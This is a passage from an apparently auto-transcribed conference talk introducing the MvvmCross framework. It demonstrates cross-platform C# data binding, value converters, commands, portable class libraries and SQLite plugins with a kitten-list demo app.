it would bring them together on Android, and iPhone, and on Windows Phone. And it would enable kind of this, you know, rich scrolling effect. It would enable mini games. It would enable features on top of your social streams that would get you talking about the game. And the idea was you talk about the game, and then hopefully people would buy the game, they'd hear more about the game. And that was the whole point of this app, this project. So we looked at it from a technical perspective, because I'm a techie. I look at things from a geekie. And we could see all of these layers of things we'd need to write. And we could see, you know, there was service consumption, about network data, and local data, and GPS, and all sorts of things we'd need. There was app logic about, you know, if you're going to a certain place, you do this. If certain tweets came in, you do this. There was all that sort of thing. Then there was UI logic about how you logged in, about how you retweeted, about how you tweeted. And then at the bottom, there was the whizzy stuff. There was the stuff that we really wanted to make sure we had, because we wanted to provide delightful user experiences. So there were animations, there was nice layout, there was nice graphics, there was retina graphics on the right platforms. So there was real, like, concentration on making sure we had that. And so we looked at it, and we knew that we, first of all, had to support Windows Phone. Windows Phone meant that we had to support C Sharp, yeah. And then we were asked for native. So we knew for iPhone that the classic route at the time would be go objective C. And then we knew that we had Android. So we knew that we'd have Java. And we looked at this as a bunch of techies. And there were five or six of us involved in this. It was a techie project that was Pavel and Matt and John and a couple of others. And we looked at this, and this didn't fill us with joy at all, because we thought we're going to have three stacks. We're going to have a project where we want to do releases over a period of ten months. We're going to have to maintain these three stacks. We're going to have separate bugs on each platform. We're going to have separate features on each platform. Maintaining them is going to be hideous. So we looked and we saw MonoTouch and we saw MonoDroid. And we thought, can we apply that Xamarin magic? Can we apply the tools that were out there, before Xamarin iOS and Xamarin Android, the MonoTouch and Mono for Android, to turn it all into C Sharp? And then if we can turn it into C Sharp, can we unify this layer? Can we unify those top two layers so that we can share all of the things? So we actually used things like TweetSharp, we used things like RESTSharp, we used common libraries like SQLite, IphoneNet, in order to share those top two layers. And that filled us with joy. We love this sort of thing as techies. We really love to reuse our code and share our code and do things efficiently. We hate to cut and paste. We like cut and paste. We hate copy and paste. But we still looked at this and we still saw all of this UI logic. And we saw that on each platform, we would have this challenge where on Windows, we'd use NVVM because it's what we love. We use the data binding that's in XAML. On the iPhone, we looked and we saw what we had to do since called UI View Controllers. And it's a classic pattern called MVC. Everybody I hope in the room has heard of a Model View Controller. And it's really baked into the Apple approach and to Xcode and to MonoTouch as a result. That's how you do your eyes. And on Android, we saw we had activities. And activities, they are NVC, but actually they're pretty much code behind. So if you've done Windows Forms, it's a bit more like that. And we looked at them and we thought, well, we can't really share that code, which means we can't really test our UI logic as well. And you know, it's going to be hard work and we're going to have to replicate these things. And is there any way that we can unify those layers as well? So we thought if only we could actually just apply NVVM across the board, then if we could do that, then we could share our UI logic. We could test it once. We could have a single set for build and when we could push that out. And so this was where NVVM Cross version one was born back in November 2011. And version one was all about NVVM and it was all about providing data binding across all the platforms. So data binding. Don't worry, there's not too many slides, I promise. Data binding is there and it's what enables NVVM. Again, for those of you who haven't really experienced NVVM before, I hope it's not going to dive in too deep by not going through an introduction to data binding. But the idea is that in your UI definitions, whether it's a C-sharp definition of a UI or whether it's a XAML markup or an Android XML markup, you add some additional information that allows you to bind to the view model to the data. And so let's just dive in and build one of these. And we've got a plug-in that somebody in the community has made for us. And it's called the Ninja plug-in. And as you can probably see, I built one last night just to make sure it was working. But let's build a new one and we'll call it NDC. And this plug-in allows us, you know, normally in Visual Studio, we'll go to File New Project. We've got File New Solution because we want to target multiple things at the same time. And so we're just going to check everything on this list. We've got Droid, iOS, Windows Phone, Windows Store. And then let's hit Go. And let's hope I didn't make any mistakes there. And it's going to go off and it's going to generate these things for us. And at the end of this, we should within very short time have all of these projects. So as you can see, we start, it's giving us a nice little read-out. This is Adrien, by all means, send him a virtual beer or whatever to say thank you. This is excellent. And what you get here is you've got a simple project, just a starter project like you would with File New Project Wizard. And in there, we've got a first view model. And this first view model's just got, you know, my property in there, a standard kind of raise property change thing. And so let's just call this MVX NDC to prove it's live. And that's got what you expect of raise property change. Yeah, the coding style here is my coding style. This is obviously a very much style cop type coding style. But it's good because you can use that in your enterprises. If you've got teams and you've got resharper and you've got style cop, it really gives you that unification of feel. And you know, it does it automatically without you having to argue. So that's our basic view model. It's just got one property. And we're going to just get a data bind to it to start with. So let's just dive down and let's see dubpf. So, you know, I guessing that most of you in the room have seen dubpf data binding before. I won't even show you the designer. I can work out how to use this. And it's just the XML. And you can see that normally when you're using the data binding, you'll put in these curly brace syntax, you'll bind to my property and you'll do a two way bind. So we've got two controls here, both bound to my property. And if we hit debug start new, it'll go off and build it. And hopefully we'll get a very ugly dubpf app. But you can see, you know, it says MVX NDC. Really, I should have changed it to say hello NDC. And then we'll be tab away. The data binding happens and everything's updated. So that's your standard dubpf approach. Similarly, we've got a Windows Store and you'll see very similar XML in Windows Store. And if we run that one up, then you'll get, you know, an instant little bit of data binding for Windows Store. All sharing the same view model, all sharing that same code. So again, if it's hello NDC, we tab away and it updates. Similarly, if we have Windows Phone, you'll get exactly the same experience. We'll have to stop some of these debuggers at some point. So I'm just running the Windows Phone. Oops. No, I do need to do one thing here. I've turned off virtualization in my laptop, just because I use it for the Android emulator and an Android emulator uses it, then it means the Windows Phone can't. So I just need to turn down to the old style emulator, if it will let me. So if I go back to the Windows Phone 7 emulator and I run it up, then hopefully it will connect to this existing one. And what we should see is you get exactly the same data binding, exactly the same logic. Ah, without a keyboard. So data binding in action there. So those are the traditional platforms. Those are also the new platform for Windows. And you can see that we're sharing code automatically. We're sharing code by default. So if we've got these unit tests here, by default it's just an empty unit test that's generated, but you could put logic in there. Then you can test it. So if you want to test validation of your login credentials, then you're automatically set up when you use this approach to have that tested across all the platforms. So let's move on to the Xamarin platforms as well. And we're going to start with Xamarin.Android. And you can see what's generated here is a default Xamarin.Android project. And just I'm going to go through a bit more detail of these guys because you probably haven't seen an Android project in as much detail before. What we get is we, for every platform we have a setup file. And the setup file really doesn't do very much for a default except it tells where to look for the application and the view models. So it tells it to look in that core assembly where our view models are. We also have some linker please and clue, which is a techie detail which I'm going to pass over. We've got a splash screen and then we've got a views folder. And in the views folder we put our views. Now the views you'll notice are very much like a Windows view, you know, a page in Windows phone or in Silverlight or in Dubf. And there's very little code behind again. Instead of code behind what you get is you get a link to a resource. And these resources are XML files. Now obviously they're not XAML files. Instead of that they put the A and the X the other way around and they're A XML files. And you can see what an A and XR file looks like. There is a design that comes with Android. Let me just stop running because I'm not using so much. There is a designer which I can show you which allows you to, you know, drag and drop. I don't tend to use the designer. I'm kind of an XML guy so I just edit the XML directly. And the XML looks like this. So instead of stack panels what you get is you get a linear layout. It's exactly the same type of layout as a stack panel for those of you who use to XAML. Instead of edit text you get a text box, sorry, instead of text box you get an edit text. And instead of text block which you get in obviously all the way to XAML platforms, you get a text view. And you can see that what we've got in here is we've got normal Android attributes. So we've got things which say layout width, please fill my parent. I hope this is readable enough for even those of you who haven't seen Android before. And for layout height please wrap to whatever the height of my current content is. Text size again should be self-explanatory. But what's special, what we've introduced for MVVM cross are these extra ones, these MVX bind. And what this line says is it says please bind my text property to the my property on the view model. Now you might have expected if you'd come from Windows to see mode equal to way there. But actually I don't like mode equal to way because I always forget it whenever I'm doing XAML. And so we've kind of made that the default on an edit text because we've now got control of the binding layer. So we've made that the default. And now let's run this up. Let me just remove what I've just added. And when we run that up it should run in the emulator. And the emulator is already here. It takes a moment to deploy. Build started. Just thinking about it. And then when it deploys we should hopefully see that we get exactly the same experience as we had before. And if we edit text here you'll see that it actually edits in line so it's not that kind of delayed tab away. But you can see that it's live data binding going on. So there's a text view and an edit text bound together. So the final platform that we've got in the package here is also iOS. And unfortunately I can't run iOS live here because I did bring the Mac so I could run it and connect across a remote desktop. But unfortunately the network here won't let me connect on the ports that I want to connect. So instead of that I've pre-canned the demo part of this. I recorded it in the hotel last night. But what you'll see inside the iOS is you'll see exactly this, a very similar type of setup in terms of project. So you'll see we've got a setup. You see we've got that odd linker please include file. And you'll see that we've kind of just got some default files like app delegate and main which you get with a normal one-of-touch product. And then inside the views you'll see that we have a couple of views again. And if you look in first view then instead of having XML here we're actually doing our layout here by code. And this is the way quite a lot of iOS UIs are built in code. And you can see that what we do is we lay out and we have a UI label. So instead of a text block we've got a UI label. Instead of a text view we've got a UI label. And we put its location at this rectangle. We add it to ourselves. We then get a text field. And then there's this code here. And this code here does the binding. And you can see I hope as you read through we've got a fluent syntax. And actually it's a little bit borrowed this fluent syntax from a guy sitting in the front row there, Paul. It's a bit inspired by it by the work they've done in Reactive UI. And it enables us to bind to various properties on the view model in a very straightforward way. If you'd rather you can do it using text instead of using this kind of expression based syntax. But this is the way we do it by default. And so I'll just show you what this looks like when it runs up. This is what I recorded last night. And hopefully you'll see. So this is running inside the Mac. I just couldn't get them to remotely connect. Recorded in Oslo, recorded in NDC. And when you run this up, when this person who ever is stops wittering on the screen cast. When it runs up inside an emulator, then you'll see that the data binding is exactly the same experience as you had before. So if you edit the top one, the bottom one goes. And this gives you the testability of your UI because you can test that view model and you can test it across all your platforms. So that's binding a simple property. What else can you do? Well, so if you're used to using NVVM, then no doubt you'll think about things like, well, can I have a value converter? So let's build a value converter. And we've made portable value converters in NVVM Cross. And in order to build a value converter, what you do is you just declare one. So let's take the string and let's add a length value converter. Converter. And oops, I missed a class keyword. By all means, join in the big programming exercise, the pair programming we're doing here. And we will add, so it's going to inherit from something called an NVX value converter. All of our classes inside NVVM Cross start with the letters NVX, which is absolutely brilliant until you come to document them. And then you zoom through A to A to A2O and you get there and you get to M, A2O. I don't know my alphabet. You zoom up to M and then you have to start documenting M and it goes all to pop because every class starts with M. But we've got this NVX value converter and we'll import the namespace. And what we're going to do is we're going to convert a string to an int and then we'll implement it. We implement it by overriding the convert method. So if you're used to value converters, you'll just notice this is the same as a live value converter, except we've got no objects here, we've got strong types. And all I'm going to do is return value.length. And then I can build that. And that value converter will now be available in all my projects because it's portable. So it's available in all these projects down here. So for example, in first view in this Android, or I'm going to open it in the other editor, I can, for example, add another text view at the bottom here. Let's do it. And this text view I'm going to bind and all I'm going to do is I'm going to apply a converter and this converter is called length. And the reason it's called length is because over here it started with the word length. We use convention and we use a bit of reflection to find these things. And so now when we run up the Droid project, we should see that we'll have another text field that will show us the length of the current text. So there you go. We've got the things bound together. And again, if I start editing, then you'll see that everything updates all in sync. And that's really useful if you need to enable buttons as you change things. If you need to perhaps display how old you are as you're entering a date of birth, that type of thing, it's a really great way of putting things together. You can also combine multiple things together in a value converter. So if you need to take a first name and a gender and a last name and put them together to give a full title, you can do that using this type of approach. So that's value converters. What else do you get inside view models? Well, quite often you get a command. And so we'll add a command. And this command will be the NDC command. And so we're going to add in an NDC command. And I'll just do this in line. So if you're used to something like NVVM lights, then you'll have a relay command. We don't have a relay command. We have an NVX command, but it's a similar type concept. And when this command runs, what we'll do is we'll set my property to be equal to Bazinga. I should know some Norwegian really, so I can actually do this in local. Is Bazinga Norwegian? I don't think so. So as soon as we've added NDC command, then that's going to be available. And if we want to bind that to a UI element, then we can do it very straightforwardly, for example, by adding a button. And let's just copy some XML syntax so we can get there quite quickly. And on this button, I can bind the text to the button as well if you want to. I can bind it to the length as well. So we can apply multiple things. And then I'll also bind in the click event on the button. So if you're used to using XAML, you probably might have a behavior. Or if you're lucky, you've got a command on the control. Here we've got these events that are there. And we just bind directly to the event delegate. So the click event, we're going to bind to NDC command. And I'll run that up. And hopefully we'll see in the emulator that now we'll get a button. That button will have the text, which is going to be my property.length. And when we click it, we'll clear the text. Maybe the end of my demo has just, let me just see what was there. Why is it not loading for me? That's not part of the demo. Why is that happening? Anyone spot on the deliberate error as I typed through that? Let me remove this because it's not normally in there. But I don't see any errors that I made. Anyone spot anything? No, I do know, I think. I think the problem is at the moment that my project probably isn't set up correctly. So I probably haven't rebuilt my core. It's just in the configuration. So there's still a few little bugs to iron out in that new solution wizard. But I'm guessing if I rebuild it and then build, it'll run. If not, then I'll cut this out of the video afterwards. So there it goes. So there's your binding. If you change the text up here, then you'll see that everything updates. There's no icky find view by ID or get thing by name or get a tag or try and link all your code together and then do that. Everything updates. If you hit that, then the text changes. So that's data binding. If you wanted to do the same thing in Windows, then I hope most of you here will know about XAML. And if not, then as I said, there were some excellent presentations yesterday about that. If you want to do it in IOS, then what you would have to do is in FirstView, you would have to add some additional bindings and some additional UI controls. So for example, if we wanted to apply the converter here, then we'd do it using a with conversion. And we would just put the name in, like length, and it would work. If you wanted to bind to the command, then what you would do is, for example, if you wanted to have for the tap on the label, then you would actually put the name in like that because we haven't got a fluent expression syntax for that at the moment. So you put in that when it taps, I would like to bind to the NDC command on the view model. And you can see how IntelliSense helps you there. You can see how you can build it out. And also if you refactor that, it will refactor across the entire project solution. So that's data binding. I hope that was vaguely followable. Sorry about the mistake halfway through with not rebuilding. And you can see that for simple properties, we get, you know, Windows at the top, Android in the middle, and iOS at the bottom. And I hope that's followable for most people here. If you want to apply a value converter, then that's the way you do it. And I believe that our syntax is much neater and nicer than kind of the curly brace one that Windows has by default. And then if you want to bind to commands, then you can do it very straight forwardly. So that was MVVM cross V1. And that was the social storm project. And we were very lucky and very grateful to Microsoft and to McCann London to allow us to open source what we produced. And V1 was brilliant. It was absolutely amazing to develop these things. And we did have changing customer requirements all the time, which meant we wanted to refactor. And we did have changing Twitter APIs all the time, which meant that we were continually fighting builds. So we really, really benefited from being able to share all this code. Because if we had to develop those sacs separately for Android and iOS and Windows Phone and we had to cope with them, it would have been not so pleasant. However, V1 did have a slight dark side. And the dark side was that in V1, we didn't have a portable class library layer. So we had all this file linking going on, which meant we had separate files for every solutions round. So we had separate files for Android and separate files for iOS and separate files for Windows Phone. It was also just a bit fat as a library because it was a V1. And it wasn't so easy to extend or to play with because, you know, it was a V1. So what we needed really inside MVVM cross was we needed a hero. And I don't know where you guys look for heroes. I don't know where heroes normally hang out here in Norway. But we always look for heroes inside Visual Studio. And we found one. And our hero we found in the new project wizard. And it was the portable class libraries. And particularly version two that kind of came out in late 2011, early 2012. And what a portable class library is, is when you choose new, it allows you to target multiple platforms. And you get this little dialogue. And you know, you can say that I don't want to just target WPF applications. I don't want to just target Windows Store. I don't want to just target Windows Phone. What I'd like to do is I would like to target all of them. Now, obviously by targeting all of them, you do get a reduced API set because many of these things, you know, are based on the compact framework. And the idea of the compact framework is it's compact. Yeah, it's got a smaller memory space. So you don't get every API. But by selecting these, this reduced set, you can develop one project that will span everything. So this is what you get by default. Particularly thanks to John Popp's at Xamarin, who wrote a little blog post, which is very helpful. We found a way of getting Mono for Android and Mono for Touch in there. And this is well documented now how to do this. And I think official support for PCI is coming anytime in the next two weeks from Xamarin. So it's going to be brilliant. And once you've done that, then you'll get this API set. And this is taken from the Microsoft documentation. And if you're just targeting the things we're looking at, then what you get is you get this feature set. And so you'll get core, which is things like system.datetime and system.string and all the stuff that you use all the time. And it's really useful having that. Yeah. Don't, you know, underestimate how much value you'll get from having a single datetime and having a familiar datetime to yourselves. Because if you haven't got that, then on iOS, you'll have to know about NSDate, which is actually a long under the covers. And then you have to kind of use a calendar object to get NSDate components out, which you pass a bit. Anyway, you don't want to go there. And you'd have to know about Java. And Java is like a little peculiarity that most things are long under the covers. And there are different types of long. And if you add them together in the wrong way, it goes wrong. And then when you use a month, it's zero base rather than one base. So your code, when you cut and paste between different platforms, it'll go wrong. But it's really great to have that. Another thing that's great to have there is link. It's just brilliant. You know, we all love link. It makes it so much more productive. It makes the code so much more expressive. We've got iQueryable. We've got most of the network class library. We've got most of HTTP web request. And we're getting HTTP client in a moment. We've got serialization there. We've got most of the HTTP stuff, WCF. So if you've got legacy systems, you need to connect to from iPhones and androids and from Windows phones and Windows Store. That's the way through. We've got MVVM, which is quite useful for what we're doing. We've got Xlink. And also coming, because this is a growing API set, we've got async and await. So when I say coming, it's fully there across the modern Windows platforms. And it's in now for at the moment across Android. And I think it's in beta, sorry, across Android and iOS. So I'm not going to show much of that today, but it's coming. It's there. And this set is growing and people are working out how to extend it and extend it. And Microsoft are really quite committed to it now, not least because they fragmented their platforms more and more. And you know, Xbox One is going to come along as well. And it's really great to enable people to share it. So using this technique, what we were able to do is this is kind of, it's actually a Visual Studio 2010 screenshot. And this was taken, I guess, April last year. So just over, what, 14 months ago. And it enables to take Twitter search as one of our samples. And it enabled us to map it down to a really small sample like this. And in terms of refactoring, in terms of tooling, in terms of being able to merge in source control, in terms of the team being able to work on it, it's just brilliant. So there is slight problem, however, in the, as I say, Portable Class libraries give you a reduced API set. And sometimes you want a full API set. So what do you do when you need to access a, you know, something that's phone specific, like actually making a phone call? What do you do when you want to access geo location? Well, there are various techniques to this. You'll hear people talking about Hashif, my best friend in the world. You'll hear people talk about partial classes. But what we use, we use simple abstractions. We use interface driven development. And we've got a plug, sorry, interface driven development. And we've got a plug-in layer over the top of that. And that plug-in layer is simply a system of DLLs, which means that you can just insert these DLLs into your projects. And by convention, you'll get the right things. So again, can I just ask who already knows about IOC or do I need to? Okay. I'll quickly go through IOC. So IOC is really just about if you have things like an SQL engine, which is native or platform specific, if you have things like geo location, which is platform specific, and maybe you have a tax calculator, which is your own code, then you can declare interfaces on those. And you can put them in a big pot somewhere. And then when you need them, perhaps in a view model, then you just declare that you need their interfaces. And at runtime, you get the right implementation. So if you do the same thing and you do it on an iPhone, on an iPhone, you get an iPhone I SQL implementation, or an iPhone location implementation. And you get the same, perhaps, as a portable tax calculator. Then you put them into the iPhone pot. And then at runtime, you'll get the implementation you want. So let's quickly go back to Visual Studio, because I get bored of PowerPoint. And let's close this solution where we started. And let's show you a different way of building a project. And so what I'm going to do is let's create a new portable class library. And so we start here in Windows, and there's a portable class library. And so this is going to be called NDC kittens, which might tell some people what's coming up. You can't have a demo without kittens, zombies, gambling or sex. It's got to have something of that commitment to it. Or maybe an optocat is also available for the GitHub in the audience. So we're going to create NDC.core. And you'll get this dialogue, particularly if you modded it. And we can't support original Windows phone, but that's okay because all the Windows phones have been upgraded to Mango at least. And we hit OK, and Visual Studio goes off and implements it. And then what you can do is obviously this has got no coding at the moment. It's got this class one. We'll get rid of that. And I hope this doesn't make a loud noise. No good. So what we will do is we'll manage the new get packages, and we'll pull in, and I'm not going to use the network because it'll be too slow here. So we're going to pull in MVVM cross. And by default, when you pull in MVVM cross, then you get given an app.cs, which just tells you a little bit about how to initialize your IOC. So it's basically saying that anything ending in the word service, I'm going to put into that IOC pot, into that inversion of control. And then it also says, please, when my app starts, just show the first view model, however you do that on your platform. So what we're going to do is we're going to take a look at first view model, and it's got some default junk in there. We'll get rid of that. What we'd like to do is we'd like to do some SQL work, because that's a plugin that's going to be native on each platform. So let's go and find the SQLite plugin. So we're going to go back to new get, we'll get a local package, and there is a SQLite plugin. And we're going to install it into our portable class library. And once we've done that, then I'm going to not type this live because it would take too long, but I'm going to use a snippet. And this snippet is handily called kittens. Oops, if I could use a snippet. And what you'll see is this pulls in a first of all, it pulls in an ORM class. So it's just a, you know, data entity, which is a kitten. And each kitten has an ID, which is primary key. So if you use the databases, you'll be familiar. It's got a name, it's got a price, and it's got a kitten URL, we'll see a cute kitten. I've then got a service. So if you remember that IOC initialization code, it's going to look at that keyword of service. It's going to think that's special. I'll put that in the pot at the start up. And this is just a way for me to create random kittens so that we can have something to see at demo. And we then got this kitten Genesis service and this kitten Genesis service. Again, I'll just import the namespace. We'll generate me some random kittens and these are the top 20 kitten names on the internet. And then we've also got a data service. So this is our actual kind of repository, if you like. And I've just put some CRUD methods on the repository. So the insert, update, and delete. And then I've also put this select method, which is kittens matching. So that's the interface. And the implementation looks like this. And you'll see that the implementation in its constructor, it's going to take two things. It's going to take a SQL like connection factory. And that's something that's going to come from that SQL like plug-in. On each platform, we'll get a different one. And then we've got a kitten Genesis service. And that's the mock data service up above. So all it's going to do on startup is it's going to try and create the database. It's going to make sure there's a table in there for kittens. And if there aren't any kittens, then it's going to seed it with some random data for me. And if you take a look at what the, and again, I'll just pull in, that's Iquirible coming in. If we take a look at what the methods look like, then the CRUD methods are really simple. They're connection insert, connection update, and connection delete. And the select method is the lovely link-like syntax that we all love, the order buys, the wares, the to lists. So you get full, look, full intelligence in here and everything you really enjoy as a C-sharp developer. So that's our data service. Let's now use that. So back in our view model where we haven't got anything, in the constructor, I'm going to get hold of a data service. So I'll create a private member called data service. And then I'll initialize that from the constructor. And then what I'll do is, let's see, let's use kittens matching. So I'm going to create a property called filter. Yeah, and so that's called filter. And you can see the syntax there for raised property change, which I hope is what you're all used to and expecting. And then I'll create another property. And this property is going to be a list of kittens. And we'll have underscore kittens and kits. And then what I need to do is tie them together somehow. So what I'm going to do is, whenever my filter changes, then I'm going to call update. And let's also call update from the constructor so that we get something on startup. And let's also set the filter to a default value. And that can be C, because I think I saw some kittens with an aim of C. So the only thing I haven't implemented at the moment is update. And update is a pretty simple bit of C sharp, I think. So what I need is that when I'm updating, I'm going to ask my data service to for the kittens which match my filter. Yeah. And that's my core project done. Obviously, I can put a unit test on that. And when I put a unit test, I can pass in a mock data service. And that should work and should give me, you know, real reliability in my UI functionality. So I'll build that. That's built. That's my view model. I could connect a command line console app to that if I want to. But let's, how am I doing time wise? Oh, I'm talking a lot. So let's build a Android app to talk to it. So we go to Android. We go to Android application. And I call this ndckittens.core. So what I'll call the Android application is ndckittens.droid. And Android, if you, this is just the default Xamarin template. And you'll see you get, you know, an activity and you get some resources which are XML. I don't want the default activity because I want nvm cross functionality. So what we do is we go to new get again. And this time we'll pull in nvm cross, the core. And we will pull in SQLite because we want the native SQLite for Android. And this really will. It will be the C++ component that's sitting inside the Java layer and sitting inside Android. So we'll pull it in. And once we've done that, what you'll see is you'll get these default files like set up. And set up is saying please run core.app. So we're going to have to reference that core project. Let's do that. Add reference. Reference the core where the view model is. And then once we've done that, we'll just need to do our data binding. So let's do that. Obviously, we've got a first view generated here by default as well. And that's just going to use this XML file. So let's do our data binding. So let's go to our first view. And by default, we've kind of got this hello example. That's not so useful for us. So what do we want? We want an edit text or a text box at the top. And we're going to bind that to a filter. And then underneath, we want a list. So how are we going to do a list? So if you were doing vanilla Android, you would do a list view. And then you'd give that list view an Android ID with some horrible syntax. And then in the code behind, you would get hold of that. And then you would create another class that is called an adapter. And you would inherit from that adapter. And then you would put in the adapter some get view functionality. And then you would also put some get. Anyway, we're not going to do that. Phew. What we're going to do is we're going to add the magic letters of NVX to the front of this view, which is a class that understands data binding. And in particular, what it understands is just like in WCF and in Silverlight, it understands item source. So I hope this is big enough for everyone in the audience to see. We don't need text size anymore. We do want it to fill the parent with this particular thing. So it's a list and it's going to be big. And we want to bind the item source to the kittens. So hopefully, unless I've made a mistake, we can run this up. Let's have a go. Debug start new. Build started. It's a nervous moment for me. Did I forget anything? Coping applications. Well, it built. It built that ship. It's only fair. So it's running up. And you can see what we've got is we've got some data binding at the top where we bind this thing. And if we start typing, then there are still some kittens with C and O in there. If we go for R, there's no kittens left. Now, that's brilliant, isn't it? Except this is a little bit, yeah, that's just string. We don't really want to string on there. So we've got our RUI working to a first level. But now we need to have a data template for each list item. So if you've done as Amal, and again, apologies for those of you who haven't, I'm moving forward as quickly as I can. Then what you do is you apply a data template. So we're going to do the same thing here. And what we're going to do is we're going to have an NVX item template. And we're going to reference another XML file that's over here in the layout folder. So to do that, it's a little bit of Android syntax. It's layout slash. And then it's the name of the file we want to use. So I'm going to call this file item kitten. And the reason I use kind of these prefixes is just because Android has this horrible flat file thing. And so it's the only way of grouping them together. You can't use subfolders. So that's why I've used prefixes to try and group my resources files together. So that's it. I'm going to use item kitten. And let me just, I'll copy and paste first view. And I will create item underscore kitten. And what do we want in item kitten? So let me remove this. And what we'd like is we would like to have, let's just do a layout which is going to be horizontal. So it's a stack panel. It's going to go across the page. And let's do a image, first of all. And so this is going to be an NVX image view. And we're going to give this a fixed height, oops, NVX image view. We're going to give this a fixed height and width. So we're going to say this NVX image view should be, let's make it 100 dp, which is a fixed unit, and 100 dp. And obviously we'll have to terminate that. And then what we would like to do is we'd like to put the image in there. And I'll come back to that in a moment. But what we'd also like to do is we'd like to put a text view in there. And so the text view we're going to bind to the name. So let's just do the layout width is going to be filled parent and the layout height for the text view is going to be wrap content. And then let's, and again, you can use the designer for this if you prefer. Let's put the font size again, a bit larger so you can see it. So text size equals 40 dp. And let's then bind. So we're going to use local colon NVX bind. And we're going to bind the text to the name of the kitten. So that's the text view done. The remaining thing is really this image view. And what we'd like to bind on the image view is a property called image URL. And the property we'd like to bind it to is to the kitten URL on the kitten. So we do that. And let's just put that together. Now there's one more thing you have to do for Android, which is because, and like with Windows, you're used to the fact that if you just bind images, then they automatically get downloaded using the Internet Explorer cache and they get put into your application. Yeah, with Android, you don't get that. So there's another plugin we have to add just for Android. And basically we have to add the, oh, I have got that one now. Basically we have to add the download cache plugin. And the download cache plugin also relies on the file plugin in order to store these things as files. So you install those and all they've done is added some references in here. And then we should be able to run this up. And unless I've made a mistake, then we should be able to see some prettier lists on our screen. So I hope so. So there's our list. And if we start filtering, so if we start filtering down, then we remove the filter to start with. Then we get all of our kittens and these are in price order because that's the way we set up our thing. And then if we start typing and we'll just look for the pollies of the world. So if we start typing for polly, then hopefully we get pause and polly together in this list and Pepsi. And if we start PO, then we get just the pollies in the list. POL will still get them. If I misspell polly, we lose them all. So that's data binding working. There's no C-sharp code behind in the UIs. Everything's testable and that's the way our applications put together. I've overrun a bit so I won't go fully into the iOS demo to do the same thing. But what I will do is return to the slides and just show you. So this would be what the windows would look like for a list for data binding. For Android, you've just seen. You kind of use these templates. And for iOS, what you can do is you can define table view sources and it's the same sort of approach. And it allows you to bind these things together. And if you want to do custom cells, you can do it. So I'll just skip forward and show you a little bit of this movie. So if you want to do custom cells, then let me just find some custom cells in here. Then you should be able to declare them using the interface designer. So there is a designer for iOS, but it produces really not human-friendly XML file, should we say, called nibs or zips, depending on how you're feeling like saying them. And these files are not the easiest to use. So one of the things you'll discover is people don't use them if they want to use source control very much because they change every time you edit them. So it's very hard to do merges. It's very hard to do team efforts where you want to merge them together or to do revision history and source control. So that's what you do. And then when you put this together as an actual app, you will hopefully see something like this where you get a custom list and you'll get the kittens and the prices, et cetera. So sorry that I can't demo that live, but as I say, the Mac wouldn't connect on the network here, so I couldn't do that. Okay, so that's lists. And that's also, I hope you saw, plugins. So I hope you saw issues in the SQLite plugin. It's the same for other plugins like network plugins and messengers and camera if you want to access and take pictures. And the best thing about this plugin list is it's extensible. Yeah, so if you want to create your own plugins, it's really simple to do. You just create an interface in a core portable class library, like, you know, this is the vibration sample. There's a little bit of boilerplate code so that it'll help the conventions along to load it. And then after that, you can create platform-specific ones. So here's the vibration plugin that works on Android. And that's a native library that plugs in. The most famous example for plugins was the Spharo example I did. So this was a controller for Spharo, which is a robot which kind of glows and spins and does all sorts of things. And this was a, hopefully I won't get sound on this. This is an example we did in Evolve out in Texas. Well, we controlled seven of these from a phone. And this is cross-platform code. So this isn't your typical NVVM sample. You know, this is controlling robots using accelerometer, using speech, using all sorts of native services. But this is what we managed to put together so that, you know, you can see, hopefully, these are going to do a little dance and jig around the room and all sorts of things. So think about it as you move forward into future, you know, platforms. It's not just about static UIs on screens. It's also about speech, obviously Siri and things like that. It's also about controlling external factors and the Internet of Things. So that was the most famous example, perhaps. And that was what NVVM Cross Vnext was all about. It was all about PCLs and plugins. And NVVM Cross was really, Vnext was amazing. We really, really, really loved NVVM Cross Vnext. However, it did have a bit of a dark side. And the dark side was the getting started was described as a learning cliff that most people had to really kind of build it from source. They had to go to GitHub and download it and work out. And it also had some quite of a boast of very long class names, in fact, very, very long class names. And so we knew that we needed to evolve. And so the path that we took for, oops, I'll destroy myself. Hopefully, I've still got sound. The path that we took for our evolution is really a path from NVC, which most of you know has been around since the 70s. I seem to have heard it was invented in Norway, but I may be wrong. And it's been around since the 70s and it's model view controller. And in the middle of the 2000s along came Microsoft and John Grossman and the team inside Vista and Longhorn. And they produced NVVM, which relies on this data binder to have this view model, this model of the view. And this was middle 2000s. It hasn't really changed that much since. There are some notable exceptions, reactive, for example. But what we are heading towards is model view cross platform. And we're really looking at how that code can be shared and can be really empowered across multiple platforms. And it's not just about these phone platforms, it's also about the Xbox. It's also about Google Glass. It's also about TVs. It's also about the future. And the things we've added in the recent things, you've seen quite a lot of them. You've seen the clean binding. We've added Android fragments. We've added WPF. We're adding.Mac. And this is still a work in progress. We've still got a few things outstanding. But at the moment, NVVM cross V3, which is what you've kind of seen demoed, is amazing. And we really love it. And it doesn't have a dark side. And it is a work of awesomeness. There are a lot of people who built it and have contributed. And all of these people, I thank them. And I put them in every presentation to thank them. People are spotted people, they know. And it's a really huge thanks to them. And it's thanks to them that we now have samples like we've got, for example, a fractal sample. So this again is data binding. It's data binding to a mathematical model with a huge bitmap. And you're binding to this image at runtime. And generating at runtime. And this is cross platform. It's across all four of our key targets. So I can also show that running on iPhone. And it's actually very interesting to run it on a retina iPad. Because you get to see some limits of memory and some limits of calculation as you do this. So it's exactly the same code, exactly the same controls around and that UI is. And we can build that forwards. We've also got plenty of other samples. We've got things like Internet minute, which is a scary thing to watch because it tells you what's happening at the Internet in real time. So you can see all the botnet infections that are happening around us. You can see all the apps being downloaded. The email sent is just hideous to look at. And we've got other things that we can show there as well. In terms of real apps, well, obviously, Connect Star Wars was where we started. It's no longer really available because Twitter's broken the API and that, you know, there's no longer a huge need to sell that game. So I won't show you the video for Connect Star Wars. We've got things like this is a company called Bruel and Kaia from Denmark. And they are international. They are leaders in noise and vibration monitoring. And what they have is they had an installed base of Silverlight apps. So NVVM and Silverlight. And obviously Silverlight was no longer the future. And what people were asking for is can I have it on my iPad, please? Can I have it on my Android? And so they took a NVVM across version one and they ported it. So it's not just about text fields on the screen. It's also about maps. It's also about these heat bars. It's about charts. It's all data bound. It's all data bound to the same view models across three different platforms. And it's fabulous. It's by a guy called Thomas, particularly from Cheesebarron who's done this. And it gives them a testable platform for the future. There's a company called Centra Stage who do monitoring and all this thing of networks. And so they allow you to log in. And so they took their web-based system and their kind of desktop trade thing on PCs. And they plugged it in 